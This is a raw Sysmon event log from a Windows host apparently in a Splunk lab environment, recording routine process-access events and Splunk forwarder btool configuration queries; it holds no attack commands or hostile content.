13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-CF00-00000000A301}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE6-6005-CF00-00000000A301}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.646{59A5CD1D-8EE6-6005-CF00-00000000A301}4784C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.609{59A5CD1D-8EE6-6005-CE00-00000000A301}48684788C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.374{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-CE00-00000000A301}4868C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-CE00-00000000A301}4868C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8EE6-6005-CD00-00000000A301}48324848C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE6-6005-CE00-00000000A301}4868C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.375{59A5CD1D-8EE6-6005-CE00-00000000A301}4868C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE6-6005-CD00-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000003944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.359{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-CD00-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 